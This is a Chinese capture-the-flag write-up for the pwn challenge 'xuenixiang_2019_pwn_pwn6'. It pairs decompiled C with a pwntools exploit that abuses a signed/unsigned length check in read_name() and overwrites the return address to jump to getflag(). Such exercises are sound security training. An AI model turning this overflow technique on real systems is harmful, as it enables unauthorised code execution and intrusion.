xuenixiang_2019_pwn_pwn6 wp by kone
思路:1.read_name()函数存在整数溢出漏洞,输入-12.输入payload修改read_name()返回地址为getflag()
注意:
1.payload不要修改v2和i,否则可能导致逻辑不符合预期
2.注意返回地址的位置
exp:
#-*- coding:utf-8 -*-
"""
// xuenixiang_2019_pwn_pwn6: https://www.xuenixiang.com/ctfexercise-competition-352.html
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; //
unsigned int buf; //
int v6; //
int fd; //
int i; //
setvbuf(stdout, 0, 2, 0);
puts("###### Welecome to ctf game ######\ninput your name length : ");
read_name();
puts("let's begin guess num game ");
fd = open("/dev/urandom", 0);
if ( fd < 0 || read(fd, &buf, 4u) < 0 )
{
puts("error");
exit(0);
}
close(fd);
srand(buf);
for ( i = 0; i <= 9; ++i )
{
v6 = rand() % 9 + 3;
printf("Round %d , please guess the num : \n", i);
fflush(stdout);
fflush(stdin);
__isoc99_scanf("%d", &v4);
if ( v4 != v6 )
{
printf("you fail");
exit(0);
}
}
printf("u are great! this is your flag");
getflag();
return 0;
}
int read_name()
{
char s; //
unsigned int v2; //
unsigned int i; //
memset(s, 0, 0x50u);
__isoc99_scanf("%ld", &v2);
if ( (signed int)v2 > 48 )
{
puts("too long!!! u are a hacker!!!");
exit(0);
}
puts("please tell me your name : ");
fflush(stdout);
fflush(stdin);
for ( i = 0; i < v2; ++i )
{
read(0, &s, 1u);
if ( s == 10 )
{
s = 0;
return printf("helllo %s\n", s);
}
}
return printf("helllo %s\n", s);
}
"""
from pwn import *
import sys
context(arch="i386", os="linux", log_level="debug")
if len(sys.argv) == 2:
p = process(sys.argv)
elif len(sys.argv) == 3:
p = remote(sys.argv, sys.argv)
else:
print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
exit(1)
p.recvuntil("input your name length : \n")
p.sendline("-1")
p.recvuntil("please tell me your name : \n")
getflag_addr = 0x80486bb
payload = 'A' * 0x50 + '\xff\xff\xff\xff' + p32(0x58) + 'B' * 8 + p32(getflag_addr)
p.sendline(payload)
p.interactive()
页:
[1]